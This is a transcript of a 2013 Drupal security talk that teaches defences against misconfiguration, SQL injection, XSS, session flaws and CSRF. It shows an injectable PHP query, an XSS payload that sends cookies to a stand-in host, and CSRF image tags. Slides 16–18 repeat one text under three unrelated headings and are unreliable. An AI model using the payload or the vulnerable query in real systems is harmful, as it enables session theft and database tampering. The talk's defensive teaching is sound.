Drupal Security

Transcript

1. Drupal Security Drupal Developers Day 2013 Microsoft Philippines, Ayala, Makati

   City, Philippines

2. I. Security Misconfiguration Secure your server 1. Avoid using FTP

   at all cost 2. Who do you share your server with? 3. Keep your OS, PHP, SQL server, etc. up to date

3. I. Security Misconfiguration •  Are you using human readable password?

   •  Check all Administer permissions •  Administer filter can take over a site •  Use update.module •  Have you visit or subscribe to drupal security page? •  Avoid any kind of PHP input, wrote your own modules instead of •  Watch your input formats

4. I. Injection mysite.com/index.php?id=777 mysql_query(“UPDATE mytable SET value = ‘”. $value

   .”’ WHERE id = ”. $_GET[‘id’]);

5. I. Injection Drupal approach db_query(“UPDATE {mytable} SET value = :value

   WHERE id = :id”, array (‘:value’ => $value, ‘:id’ => $id); If you need to include dynamic table or column names in your query, see db_escape_table()

6. II. Cross Site Scripting XSS is very similar to SQL-Injection.

   In SQL-Injection we exploited the vulnerability by injecting SQL Queries as user inputs. In XSS, we inject code (basically client side scripting) to the remote server.

7. Types of Cross Site Scripting 1.  Persistent 2.  Non-persistent

8. Persistent Attack In case of persistent attack, the code injected

   by the attacker will be stored in a secondary storage device (mostly on a database). Ex. Session Highjacking

9. Persistent Attack <a href=# onclick=\"document.location=\'http://not-real- xssattackexamples.com/xss.php?c=\'+escape\ (document.cookie\)\;\">My Name</a>

10. Persistent Attack Drupal Approach check_plain() to escape text to HTML

    check_markup() to format text to HTML filter_xss() to filter text to HTML filter_xss_admin() to filter admin text to HTML node_view($node) instead of $node- >body

11. III. Authentication & Sessions •  Weak password storage and account

    management •  Session hijacking / fixation •  Lack of session timeout / logout

12. III. Authentication & Sessions Drupal Approach •  Passwords are stored

    encrypted •  Session IDs changed when permissions change •  Drupal works with Apache’s SSL transport •  Modules to set certain URLs to use SSL

13. IV. Cross Site Request Forgery <img src=”http://mysite.com/ user/logout” />

14. IV. Cross Site Request Forgery http://example.com/index.php? delete=12 <img src=”http://example.com/ index.php?

    delete=12” />

15. IV. Cross Site Request Forgery Drupal approach Form API works

    with POST submissions by default (makes it harder) Form API includes form tokens, requires form retrieval before submission, checks valid values drupal_valid_token() provided to generate/ validate tokens for GET requests

16. One-way Hash Different randomly generated private key is provided on

    each site, which can be used to do reversible encryption Up to you to ensure backups are properly protected

17. Failure to Restrict URL Access Different randomly generated private key

    is provided on each site, which can be used to do reversible encryption Up to you to ensure backups are properly protected

18. Invalidated Redirects Different randomly generated private key is provided on

    each site, which can be used to do reversible encryption Up to you to ensure backups are properly protected

19. Thank You

20. References •  https://drupal.org/writing-secure-code •  https://www.owasp.org/images/0/0f OWASP_T10_- _2010_rc1.pdf#sthash.f1xApQ6j.dpuf •  http://drupalscout.com/knowledge-base/ best-practices-drupal-permissions

    •  http://drupalscout.com/knowledge-base/ introduction-cross-site-scripting-xss-and- drupal •  Gabor Hojtsy of Drupal.org Security